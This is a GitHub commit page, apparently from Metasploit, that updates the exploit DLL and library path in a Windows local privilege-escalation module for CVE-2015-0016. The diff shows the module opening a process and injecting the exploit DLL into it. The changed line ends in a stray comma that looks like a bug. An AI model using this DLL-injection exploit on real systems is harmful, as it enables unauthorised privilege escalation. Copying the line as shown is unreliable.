Skip to content

Commit

Permalink
Update DLL
Browse files Browse the repository at this point in the history
  • Loading branch information
jvazquez-r7 committed Aug 26, 2015
1 parent dd52901 commit 5d0ed79
Show file tree
Hide file tree
Showing 2 changed files with 1 addition and 1 deletion.
Binary file modified data/exploits/CVE-2015-0016/cve-2015-0016.dll
Binary file not shown.
2 changes: 1 addition & 1 deletion modules/exploits/windows/local/ms15_004_tswbproxy.rb
Expand Up @@ -115,7 +115,7 @@ def exploit
print_status('Exploiting...')

process = client.sys.process.open
library_path = ::File.join('/', 'tmp', 'reflective_dll.dll')
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'),
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)

Expand Down

0 comments on commit 5d0ed79

Please sign in to comment.